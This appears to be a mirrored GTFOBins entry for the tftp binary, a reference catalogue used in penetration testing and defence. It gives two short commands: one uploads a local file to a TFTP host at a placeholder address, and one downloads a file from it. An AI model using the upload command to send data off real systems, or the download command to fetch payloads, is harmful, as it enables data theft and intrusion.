1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-03-13 02:58:09 +01:00

15 lines
315 B
Markdown
Raw Normal View History

2018-05-21 20:14:41 +01:00
---
functions:
upload:
- description: Send local file to a TFTP server.
code: |
RHOST=10.0.0.1
tftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a TFTP server.
code: |
RHOST=10.0.0.1
tftp $RHOST
get file_to_get
---